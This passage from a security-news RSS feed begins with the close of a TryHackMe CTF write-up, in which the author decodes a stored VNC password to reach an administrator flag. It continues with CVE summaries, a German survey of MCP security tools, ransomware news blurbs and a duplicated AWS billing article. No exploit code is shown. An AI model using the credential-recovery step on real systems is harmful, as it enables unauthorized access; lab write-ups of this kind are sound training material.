src="https://cdn-images-1.medium.com/max/666/1*0Qhoz02MgHQ-GUJcsYtn2Q.png"></figure><ul><li>As can be seen in the first lines of the file itself, we found the encoded password.</li><li>I took the encoded parts of the password and used this website to decode them. <a href="https://keydecryptor.com/decryption-tools/vnc">Online VNC Password Decoder (Decryptor) — KeyDecryptor Tool</a></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vcNZJbS7yupNyyTcjDDO5Q.png"></figure><ul><li>I had successfully obtained the VNC password. The only objective that remained was the administrator flag.</li><li>I checked the Desktop folder of the Administrator and found the admin flag in admin_flag.txt .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4Tn_PSdY2jrzVpJ-1Y0hHA.png"></figure><ul><li>And with that, all the flags were obtained, and the room was solved!</li></ul><p>I hope you found this write-up useful. Make sure to drop a follow for more such content in the future.</p><p>Happy Hacking!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=006864c93de0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/allsignspoint2pwnage-tryhackme-windows-write-up-006864c93de0">AllSignsPoint2Pwnage — TryHackMe Windows Write-up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16489 | jsforce up to 3.10.16 SFDX Connection Registry lib/registry/sfdx.js _execCommand os command injection (Issue 1805 / EUVD-2026-47593)]]></title>
<description><![CDATA[A vulnerability was found in jsforce up to 3.10.16. It has been classified as critical. This issue affects the function _execCommand in the library lib/registry/sfdx.js of the component SFDX Connection Registry. The manipulation leads to os command injection.

This vulnerability is referenced as ...]]></description>
<link>https://tsecurity.de/de/3685651/sicherheitsluecken/cve-2026-16489-jsforce-up-to-31016-sfdx-connection-registry-libregistrysfdxjs-execcommand-os-command-injection-issue-1805-euvd-2026-47593/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685651/sicherheitsluecken/cve-2026-16489-jsforce-up-to-31016-sfdx-connection-registry-libregistrysfdxjs-execcommand-os-command-injection-issue-1805-euvd-2026-47593/</guid>
<pubDate>Wed, 22 Jul 2026 10:31:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/jsforce">jsforce up to 3.10.16</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects the function <code>_execCommand</code> in the library <em>lib/registry/sfdx.js</em> of the component <em>SFDX Connection Registry</em>. The manipulation leads to os command injection.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-16489">CVE-2026-16489</a>. The attack can only be performed from a local environment. Furthermore, an exploit is available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Tools, um MCP-Server abzusichern]]></title>
<description><![CDATA[width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px">Unabhängig davon, welche MCP-Server Unternehmen wofür einsetzen – “Unsicherheiten” sollten dabei außenvorbleiben.Gorodenkoff | shutterstock.com



Model Context Protocol (MCP) verbindet KI-Agenten mit Datenquellen und erfre...]]></description>
<link>https://tsecurity.de/de/3685216/it-security-nachrichten/tools-um-mcp-server-abzusichern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685216/it-security-nachrichten/tools-um-mcp-server-abzusichern/</guid>
<pubDate>Wed, 22 Jul 2026 06:10:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Unabhängig davon, welche MCP-Server Unternehmen wofür einsetzen – “Unsicherheiten” sollten dabei außenvorbleiben.</figcaption></figure><p class="imageCredit">Gorodenkoff | shutterstock.com</p></div>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.computerwoche.de/article/4031227/was-ist-model-context-protocol.html" target="_blank">MCP</a>) verbindet KI-Agenten mit Datenquellen und erfreut sich im Unternehmensumfeld wachsender Beliebtheit. Allerdings ist auch MCP nicht frei von Sicherheitslücken, wie entsprechende Entdeckungen, etwa beim SaaS-Anbieter <a href="https://www.upguard.com/blog/asana-discloses-data-exposure-bug-in-mcp-server" target="_blank" rel="noreferrer noopener">Asana</a> oder dem IT-Riesen <a href="https://www.catonetworks.com/blog/cato-ctrl-poc-attack-targeting-atlassians-mcp/" target="_blank" rel="noreferrer noopener">Atlassian</a> gezeigt haben. Inzwischen hat sich jedoch einiges in Sachen MCP-Sicherheit getan. Einerseits wurden mit Blick auf das Kernprotokoll etliche Fortschritte erzielt. Beispielsweise in Form von Support für OAuth sowie für Authentifizierungs-Server von Drittanbietern und Identity-Management-Systeme. Darüber hinaus wurde inzwischen auch eine <a href="https://modelcontextprotocol.info/tools/registry/" target="_blank" rel="noreferrer noopener">offizielle MCP Registry</a> geschaffen, die einen Überblick über sichere, öffentlich verfügbare MCP-Server bietet.</p>



<p class="wp-block-paragraph">Dennoch bestehen weiterhin Sicherheitslücken, die sich für diverse Cyberschandtaten ausnutzen lassen – <a href="https://www.computerwoche.de/article/4044551/wenn-der-ki-agent-im-fakeshop-kauft.html" target="_blank">Prompt Injection</a>, Tool Poisoning, Token-Diebstahl, Server-übergreifende Attacken oder manipulierte Messages sind nur einige von vielen Beispielen. Mit anderen Worten: Unternehmen, die sich beim <a href="https://www.computerwoche.de/article/4049237/3-tipps-um-agentic-ai-systeme-in-der-cloud-zu-entwickeln.html" target="_blank">Aufbau von Agentic-AI-Systemen</a> einen Wettbewerbsvorteil verschaffen wollen, müssen erhebliche Anstrengungen unternehmen, um zu gewährleisten, dass sensible Daten nicht nach außen dringen. Glücklicherweise gibt es diverse Tools, die dabei Unterstützung versprechen.</p>



<p class="wp-block-paragraph">In diesem Artikel lesen Sie:</p>



<ul class="wp-block-list">
<li>was Security-Tools für MCP leisten sollten, und</li>



<li>welche Angebote in diesem Bereich interessant sind.</li>
</ul>



<h2 class="wp-block-heading">Das sollten MCP-Sicherheitslösungen können</h2>



<p class="wp-block-paragraph">Die Gefahr von Datenlecks, Prompt Injections und weiteren Sicherheitsbedrohungen besteht unabhängig davon, ob Unternehmen:</p>



<ul class="wp-block-list">
<li>ihre eigenen KI-Agenten mit MCP-Servern von Drittanbietern,</li>



<li>ihre eigenen MCP-Server mit Drittanbieter-Agenten, oder</li>



<li>ihre eigenen Server mit den eigenen Agenten verbinden.</li>
</ul>



<p class="wp-block-paragraph">Soll heißen: Unternehmen müssen in jedem Fall Autorisierungen und Berechtigungen überprüfen, detaillierte Zugriffskontrollen implementieren und alles protokollieren. Daraus ergeben sich auch die Anforderungen für MCP-Sicherheitslösungen. Diese sollten bieten:</p>



<ul class="wp-block-list">
<li><strong>MCP-Servererkennung.</strong> Für Mitarbeiter eines Unternehmens ist es einfach, MCP-Server herunterzuladen und zu nutzen. Mit Scan-Services für MCP-Server können Unternehmen sämtliche Instanzen von Schatten-MCP-Servern in ihrer Umgebung finden.</li>



<li><strong>Laufzeitschutz.</strong> KI-Agenten kommunizieren mit MCP-Servern in natürlicher Sprache. MCP-Sicherheits-Tools sollten deshalb in der Lage sein, diese Kommunikation auf Sicherheitsprobleme wie Prompt Injections hin zu überwachen.</li>



<li><strong>Authentifizierungs- und Zugriffskontrollen.</strong> Das MCP-Protokoll unterstützt inzwischen OAuth, aber das ist nur ein erster Schritt. Für zusätzliche Sicherheit empfehlen sich Tools mit integrierten Kontroll-Frameworks für Zero Trust und Least Privilege.</li>



<li><strong>Logging und Observability.</strong> Tools und Plattformen sollten zudem die Möglichkeit bieten, MCP-Protokolle zu sammeln, Sicherheitsteams über Richtlinienverstöße zu informieren, Compliance-Daten zu erfassen oder Protokolle in die bestehende Sicherheitsinfrastruktur einzuspeisen.</li>
</ul>



<h2 class="wp-block-heading">MCP-Security-Angebote</h2>



<p class="wp-block-paragraph">Im Folgenden haben wir die Anbieter von MCP-Security-Tools in drei Kategorien aufgeteilt. Diese Aufstellung erhebt keinen Anspruch auf Vollständigkeit.</p>



<p class="wp-block-paragraph"><strong>Hyperscaler</strong></p>



<p class="wp-block-paragraph">Für Unternehmen, die sich vollständig auf eine bestimmte Cloud-Plattform verlassen, bieten die MCP-Tools des jeweiligen Hyperscalers einen einfachen Einstieg.</p>



<ul class="wp-block-list">
<li><strong>Amazon Web Services (AWS)</strong> hat Mitte 2025 seine eigene agentenbasierte KI-Plattform eingeführt. <a href="https://aws.amazon.com/de/bedrock/agentcore/" target="_blank" rel="noreferrer noopener">Amazon Bedrock AgentCore</a> umfasst ein Gateway, das mehrere Protokolle unterstützt (darunter auch MCP), ein Identity-Management-System sowie Observability.</li>



<li><strong>Microsoft</strong> bietet einen grundlegenden <a href="https://learn.microsoft.com/de-de/azure/developer/azure-mcp-server/overview" target="_blank" rel="noreferrer noopener">Azure-MCP-Server</a> an, inklusive Support für Azure Key Vault. Darüber hinaus unterstützen auch Azure AI Foundry Agent Service und Azure API Management das Model Context Protocol. Zudem bietet Microsoft mit dem <a href="https://learn.microsoft.com/de-de/agent-framework/overview/agent-framework-overview" target="_blank" rel="noreferrer noopener">Agent Framework</a> auch ein Open-Source-Entwicklungskit, das sowohl MCP als auch Agent2Agent unterstützt und beispielsweise Schutz vor Prompt Injections verspricht.</li>



<li><strong>Google Cloud</strong> kündigte Anfang 2025 seine <a href="https://cloud.google.com/blog/products/ai-machine-learning/mcp-toolbox-for-databases-now-supports-model-context-protocol?hl=en" target="_blank" rel="noreferrer noopener">MCP Toolbox für Datenbanken</a> an – inklusive integrierter Authentifizierung und Observability. Außerdem hat der Hyperscaler auch <a href="https://cloud.google.com/blog/products/identity-security/how-to-secure-your-remote-mcp-server-on-google-cloud?hl=en" target="_blank" rel="noreferrer noopener">eine Referenzarchitektur</a> veröffentlicht, um MCP-Server auf seiner Cloud-Plattform abzusichern.</li>
</ul>



<p class="wp-block-paragraph"><strong>Große Plattformanbieter</strong></p>



<ul class="wp-block-list">
<li>Der IT-Dienstleister <strong>Cloudflare</strong> hat mit <a href="https://blog.cloudflare.com/zero-trust-mcp-server-portals/" target="_blank" rel="noreferrer noopener">MCP Server Portals</a> ein Tool veröffentlicht, mit dem Unternehmen MCP-Verbindungen zentralisiert absichern und überwachen können. Die Funktion ist Bestandteil der Cloudflare-One-Plattform.</li>



<li><strong>Palo Alto Networks</strong> hat mit Blick auf MCP-Sicherheit mehrere Eisen im Feuer. Mit <a href="https://www.paloaltonetworks.com/blog/2025/06/securing-ai-agent-innovation-prisma-airs-mcp-server/" target="_blank" rel="noreferrer noopener">Prisma AIRS</a> hat das Unternehmen einen eigenen, intermediären MCP-Server veröffentlicht. Dieser sitzt zwischen den KI-Agenten und dem eigentlichen MCP-Server und erkennt schadhafte Inhalte und Daten. Das Tool <a href="https://www.paloaltonetworks.com/blog/2025/06/cloud-security-model-context-protocol-mcp-security/" target="_blank" rel="noreferrer noopener">MCP Security</a> ist hingegen Bestandteil von Cortex Cloud WAAS und überprüft die MCP-Kommunikation an der Netzwerkgrenze auf bösartige Aktivitäten.</li>



<li><strong>SentinelOne</strong> gewährt mit seiner <a href="https://www.sentinelone.com/blog/avoiding-mcp-mania-how-to-secure-the-next-frontier-of-ai/" target="_blank" rel="noreferrer noopener">Singularity Platform</a> ebenfalls Einblick in die MCP-Interaktionskette und bietet zum Beispiel Warnmeldungen und automatisierte Incident Response für MCP-Server auf lokaler oder Remote-Ebene.</li>



<li>Die <a href="https://acuvity.ai/" target="_blank" rel="noreferrer noopener">Plattform</a> von <strong>Acuvity</strong> (seit Februar 2026 Teil von <strong>Proofpoint</strong>) verspricht, MCP-Server umfassend abzusichern. Dafür sorgt laut dem Anbieter eine Kombination aus Least-Privilege-Execution, unveränderlichen Laufzeiten, kontinuierlichen Schwachstellenscans, Authentifizierung und Bedrohungserkennung.</li>



<li>Daneben hat auch <strong>Broadcom</strong> MCP-Sicherheitsfunktionen für VMware Cloud Foundation <a href="https://www.broadcom.com/company/news/product-releases/63401" target="_blank" rel="noreferrer noopener">angekündigt</a>, die künftig mehr Sicherheit für agentenbasierte Workflows gewährleisten sollen.</li>
</ul>



<p class="wp-block-paragraph"><strong>Startups</strong></p>



<ul class="wp-block-list">
<li>Das API-Security-Startup <strong>Akto</strong> hat eine <a href="https://www.akto.io/mcp-security" target="_blank" rel="noreferrer noopener">MCP-Security-Plattform</a> im Angebot. Sie umfasst ein Discovery Tool, um MCP-Server in Unternehmensumgebungen zu identifizieren, Security-Testing-Werkzeuge sowie Monitoring- und Threat-Detection-Funktionen.</li>



<li><strong>Invariant Labs</strong> bietet mit <a href="https://github.com/invariantlabs-ai/mcp-scan" target="_blank" rel="noreferrer noopener">MCP-Scan</a> ein quelloffenes Tool, das die statische Analyse und Echtzeitüberwachung von MCP-Servern ermöglicht. Mit <a href="https://invariantlabs.ai/blog/guardrails" target="_blank" rel="noreferrer noopener">Guardrails</a> hat das Startup auch ein kommerzielles Produkt im Angebot. Dabei handelt es sich um einen Proxy. Der zwischen KI-Agenten und MCP-Servern sitzt und vor Security-Risiken schützen soll. Das Tool befähigt Anwender außerdem dazu, Richtlinien aufzusetzen.</li>



<li><strong>Highflame </strong>(vormals Javelin) <a href="https://www.highflame.com/" target="_blank" rel="noreferrer noopener">addressiert</a> ebenfalls das Thema MCP-Sicherheit. Etwa mit Funktionen wie MCP-Server auf Risiken zu scannen oder Datenanfragen zu überprüfen.  </li>



<li><strong>Lasso Security</strong> stellt ein Open-Source-<a href="https://github.com/lasso-security/mcp-gateway" target="_blank" rel="noreferrer noopener">MCP-Gateway</a> zur Verfügung, das die Konfiguration und das Lebenszyklusmanagement von MCP-Servern ermöglicht und Messages um sensible Informationen bereinigt.</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.csoonline.com/article/4087656/what-cisos-need-to-know-about-new-tools-for-securing-mcp-servers.html" target="_blank">im Original</a> bei unser Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The defense against the AI arts.]]></title>
<description><![CDATA[Trump's latest AI leader resigns. The Army burns through its AI tokens. Scammers impersonate IC3 personnel.HollowGraph malware uses a compromised Microsoft 365 calendar for C2. Qilin ransomware targets a critical Palo Alto Networks flaw. A North Korean campaign targets Web3 and cryptocurrency pro...]]></description>
<link>https://tsecurity.de/de/3684909/it-security-nachrichten/the-defense-against-the-ai-arts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684909/it-security-nachrichten/the-defense-against-the-ai-arts/</guid>
<pubDate>Tue, 21 Jul 2026 23:54:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Trump's latest AI leader resigns. The Army burns through its AI tokens. Scammers impersonate IC3 personnel.HollowGraph malware uses a compromised Microsoft 365 calendar for C2. Qilin ransomware targets a critical Palo Alto Networks flaw. A North Korean campaign targets Web3 and cryptocurrency professionals through fake job recruitment scams. Zimbra patches multiple critical bugs. Shadow AI creates regulatory headaches. Hackers wipe Romania’s land registry database. Our guest is Errol Weiss, Chief Security Officer at Health-ISAC, setting the record straight on ransomware trends. Patching the automotive security system you didn’t know you had.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Trump administration's AI czar resigns.]]></title>
<description><![CDATA[Extortion group wipes Romania's land registry database. FBI warns of impersonators targeting scam victims.]]></description>
<link>https://tsecurity.de/de/3684312/it-security-nachrichten/the-trump-administrations-ai-czar-resigns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684312/it-security-nachrichten/the-trump-administrations-ai-czar-resigns/</guid>
<pubDate>Tue, 21 Jul 2026 18:11:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Extortion group wipes Romania's land registry database. FBI warns of impersonators targeting scam victims.]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS standardizes more AI billing data to simplify cost analysis]]></title>
<description><![CDATA[AWS has updated AWS Data Exports, its service for generating and managing cost and usage Reports (CURs), to include standardized Amazon Bedrock product metadata, making it easier for enterprise engineering teams to analyze AI usage and spending as they scale AI deployments spanning multiple found...]]></description>
<link>https://tsecurity.de/de/3683996/it-nachrichten/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683996/it-nachrichten/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis/</guid>
<pubDate>Tue, 21 Jul 2026 16:18:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AWS has updated AWS Data Exports, its service for generating and managing cost and usage Reports (CURs), to include standardized Amazon Bedrock product metadata, making it easier for enterprise engineering teams to analyze AI usage and spending as they scale AI deployments spanning multiple foundation models.</p>



<p class="wp-block-paragraph">The update extends billing exports with normalized fields for model provider, model name, inference type, inference mode, billing unit and <a href="https://www.infoworld.com/article/2336139/amazon-bedrock-a-solid-generative-ai-foundation.html">Bedrock</a> product family, and will enable enterprises to identify which models generated costs and compare spending across providers without relying on custom parsing or normalization of billing records, AWS wrote in a <a href="https://aws.amazon.com/about-aws/whats-new/2026/07/aws-data-exports-amazon-bedrock-product-metadata/" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p class="wp-block-paragraph">That reduced reliance on custom parsing will reduce the engineering effort required to analyze billing data, analysts said.</p>



<p class="wp-block-paragraph">“Before the update, a data engineer would typically need to maintain a model ID registry, write regex against usage type strings, or join AWS CloudTrail with CUR to figure out which provider generated which cost,” said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">The new standardized fields “can be the difference between a billing pipeline that needs constant babysitting and one that doesn’t,” Chopra added.</p>



<p class="wp-block-paragraph">That’s because custom parsing logic is more prone to break down or require maintenance when AWS adds new models or updates pricing in Bedrock, said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<h2 class="wp-block-heading">Richer billing data to boost enterprise AI cost governance</h2>



<p class="wp-block-paragraph">Beyond reducing engineering overhead, the update could also help enterprises improve AI cost governance.</p>



<p class="wp-block-paragraph">Before this update FinOps teams struggled to identify which model Bedrock related to because usage type fields were inconsistent, and there was no unified product family name that captured all Bedrock costs in one place, Chopra said.</p>



<p class="wp-block-paragraph">“Now those attributes — model provider, model name, inference type, inference mode, pricing unit — are standardized and available by default. That’s the plumbing work no one talks about, but it’s what makes downstream reporting actually reliable,” Chopra added.</p>



<p class="wp-block-paragraph">This, said Jain, makes it easier to build dashboards showing cost by model, provider, token type or inference mode while also identifying expensive workloads, unusual token growth and opportunities to move to cheaper models or batch processing.</p>



<p class="wp-block-paragraph">It’s a timely update, especially in light of last week’s <a href="https://health.aws.amazon.com/health/status?eventID=arn:aws:health:global::event/BILLING/AWS_BILLING_OPERATIONAL_ISSUE/AWS_BILLING_OPERATIONAL_ISSUE_47B68_BACBD91434F" target="_blank" rel="noreferrer noopener">AWS billing issue</a> that caused some customers to see incorrect cost estimates of services consumed in the AWS Management Console, said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at FinOps services providing firm ZopDev.</p>



<p class="wp-block-paragraph">“Anything that gives customers clearer, more granular and more trustworthy billing data is welcome when confidence in the numbers has just been shaken. It does not fix what went wrong, but better visibility into where spend is going is exactly what teams want more of after an episode like that,” Bandta added.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4199470/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS standardizes more AI billing data to simplify cost analysis]]></title>
<description><![CDATA[AWS has updated AWS Data Exports, its service for generating and managing cost and usage Reports (CURs), to include standardized Amazon Bedrock product metadata, making it easier for enterprise engineering teams to analyze AI usage and spending as they scale AI deployments spanning multiple found...]]></description>
<link>https://tsecurity.de/de/3683957/ai-nachrichten/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683957/ai-nachrichten/aws-standardizes-more-ai-billing-data-to-simplify-cost-analysis/</guid>
<pubDate>Tue, 21 Jul 2026 16:05:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AWS has updated AWS Data Exports, its service for generating and managing cost and usage Reports (CURs), to include standardized Amazon Bedrock product metadata, making it easier for enterprise engineering teams to analyze AI usage and spending as they scale AI deployments spanning multiple foundation models.</p>



<p class="wp-block-paragraph">The update extends billing exports with normalized fields for model provider, model name, inference type, inference mode, billing unit and <a href="https://www.infoworld.com/article/2336139/amazon-bedrock-a-solid-generative-ai-foundation.html">Bedrock</a> product family, and will enable enterprises to identify which models generated costs and compare spending across providers without relying on custom parsing or normalization of billing records, AWS wrote in a <a href="https://aws.amazon.com/about-aws/whats-new/2026/07/aws-data-exports-amazon-bedrock-product-metadata/" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p class="wp-block-paragraph">That reduced reliance on custom parsing will reduce the engineering effort required to analyze billing data, analysts said.</p>



<p class="wp-block-paragraph">“Before the update, a data engineer would typically need to maintain a model ID registry, write regex against usage type strings, or join AWS CloudTrail with CUR to figure out which provider generated which cost,” said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">The new standardized fields “can be the difference between a billing pipeline that needs constant babysitting and one that doesn’t,” Chopra added.</p>



<p class="wp-block-paragraph">That’s because custom parsing logic is more prone to break down or require maintenance when AWS adds new models or updates pricing in Bedrock, said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<h2 class="wp-block-heading">Richer billing data to boost enterprise AI cost governance</h2>



<p class="wp-block-paragraph">Beyond reducing engineering overhead, the update could also help enterprises improve AI cost governance.</p>



<p class="wp-block-paragraph">Before this update FinOps teams struggled to identify which model Bedrock related to because usage type fields were inconsistent, and there was no unified product family name that captured all Bedrock costs in one place, Chopra said.</p>



<p class="wp-block-paragraph">“Now those attributes — model provider, model name, inference type, inference mode, pricing unit — are standardized and available by default. That’s the plumbing work no one talks about, but it’s what makes downstream reporting actually reliable,” Chopra added.</p>



<p class="wp-block-paragraph">This, said Jain, makes it easier to build dashboards showing cost by model, provider, token type or inference mode while also identifying expensive workloads, unusual token growth and opportunities to move to cheaper models or batch processing.</p>



<p class="wp-block-paragraph">It’s a timely update, especially in light of last week’s <a href="https://health.aws.amazon.com/health/status?eventID=arn:aws:health:global::event/BILLING/AWS_BILLING_OPERATIONAL_ISSUE/AWS_BILLING_OPERATIONAL_ISSUE_47B68_BACBD91434F" target="_blank" rel="noreferrer noopener">AWS billing issue</a> that caused some customers to see incorrect cost estimates of services consumed in the AWS Management Console, said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at FinOps services providing firm ZopDev.</p>



<p class="wp-block-paragraph">“Anything that gives customers clearer, more granular and more trustworthy billing data is welcome when confidence in the numbers has just been shaken. It does not fix what went wrong, but better visibility into where spend is going is exactly what teams want more of after an episode like that,” Bandta added.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15927 | Red Hat mirror registry for OpenShift/Quay Mirror configuration endpoints/api/mirror.py validate_external_registry_url external_reference server-side request forgery (EUVD-2026-46150)]]></title>
<description><![CDATA[A vulnerability was found in Red Hat mirror registry for OpenShift and Quay. It has been rated as problematic. This impacts the function validate_external_registry_url of the file endpoints/api/mirror.py of the component Mirror configuration. The manipulation of the argument external_reference le...]]></description>
<link>https://tsecurity.de/de/3683145/sicherheitsluecken/cve-2026-15927-red-hat-mirror-registry-for-openshiftquay-mirror-configuration-endpointsapimirrorpy-validateexternalregistryurl-externalreference-server-side-request-forgery-euvd-2026-46150/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683145/sicherheitsluecken/cve-2026-15927-red-hat-mirror-registry-for-openshiftquay-mirror-configuration-endpointsapimirrorpy-validateexternalregistryurl-externalreference-server-side-request-forgery-euvd-2026-46150/</guid>
<pubDate>Tue, 21 Jul 2026 11:12:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/red_hat:mirror_registry_for_openshift">Red Hat mirror registry for OpenShift and Quay</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts the function <code>validate_external_registry_url</code> of the file <em>endpoints/api/mirror.py</em> of the component <em>Mirror configuration</em>. The manipulation of the argument <em>external_reference</em> leads to server-side request forgery.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-15927">CVE-2026-15927</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[NotCVE registry index — public records of vulnerabilities that shipped without a CVE]]></title>
<description><![CDATA[Posted by NotCVE Advisories on Jul 20----------------------------------------------------------------------------
NotCVE Registry Index — 2026-07-16
----------------------------------------------------------------------------

[-] About the NotCVE registry:

NotCVE (https://notcve.org) assigns pu...]]></description>
<link>https://tsecurity.de/de/3682792/it-security-nachrichten/notcve-registry-index-public-records-of-vulnerabilities-that-shipped-without-a-cve/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682792/it-security-nachrichten/notcve-registry-index-public-records-of-vulnerabilities-that-shipped-without-a-cve/</guid>
<pubDate>Tue, 21 Jul 2026 08:08:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Posted by NotCVE Advisories on Jul 20</p>----------------------------------------------------------------------------<br>
NotCVE Registry Index — 2026-07-16<br>
----------------------------------------------------------------------------<br>
<br>
[-] About the NotCVE registry:<br>
<br>
NotCVE (<a rel="nofollow" href="https://notcve.org/">https://notcve.org</a>) assigns public identifiers to real, verifiable<br>
vulnerabilities that did not receive a CVE — typically because the affected<br>
vendor did not acknowledge the issue. Each record preserves the technical...<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still]]></title>
<description><![CDATA[BUKAREST / LONDON (IT BOLTWISE) – Ein Angriff der Gruppe ByteToBreach hat in Rumänien die gesamte Grundbuchdatenbank gelöscht und damit den Immobilienhandel weitgehend lahmgelegt. Notare können seit dem Vorfall keine neuen Transaktionen mehr veranlassen, weil Eigentumsnachweise und Details aus de...]]></description>
<link>https://tsecurity.de/de/3682470/it-security-nachrichten/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682470/it-security-nachrichten/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still/</guid>
<pubDate>Tue, 21 Jul 2026 03:06:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BUKAREST / LONDON (IT BOLTWISE) – Ein Angriff der Gruppe ByteToBreach hat in Rumänien die gesamte Grundbuchdatenbank gelöscht und damit den Immobilienhandel weitgehend lahmgelegt. Notare können seit dem Vorfall keine neuen Transaktionen mehr veranlassen, weil 